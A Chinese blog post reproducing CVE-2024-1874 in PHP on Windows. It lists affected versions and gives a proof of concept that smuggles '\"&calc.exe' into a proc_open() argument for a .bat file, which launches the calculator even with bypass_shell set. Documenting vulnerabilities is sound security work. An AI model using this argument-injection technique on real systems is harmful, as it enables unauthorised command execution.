当前位置:   article > 正文

PHP命令执行漏洞CVE-2024-1874复现

cve-2024-1874

CVE-2024-1874 PHP命令执行漏洞

影响版本

Affected versions
< 8.1.28
< 8.2.18
< 8.3.5
Patched versions
8.1.28
8.2.18
8.3.6

POC

创建一个文件test.php


<?php
$descriptorspec = [STDIN, STDOUT, STDOUT];
$proc = proc_open(["test.bat", "\"&calc.exe"], $descriptorspec, $pipes);
proc_close($proc);
  • 1
  • 2
  • 3
  • 4
  • 5

随便创建一个.bat文件,如test.bat

echo test
  • 1

然后在PHP 8.2.9nts版本下使用php test.php来执行test.php,成功RCE调起计算器。
在这里插入图片描述
即使在proc_open()函数中使用bypass shell选项,依旧RCE成功。

<?php
$descriptorspec = [STDIN, STDOUT, STDOUT];
$proc = proc_open(["test.bat", "\"&calc.exe"], $descriptorspec, $pipes, null, null, array("bypass_shell" => true));
proc_close($proc);
  • 1
  • 2
  • 3
  • 4

在这里插入图片描述

参考链接

https://mp.weixin.qq.com/s/jAeRY-XOKw8fmUDXT2ESNQ

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Li_阴宅/article/detail/917426
推荐阅读
相关标签
  

闽ICP备14008679号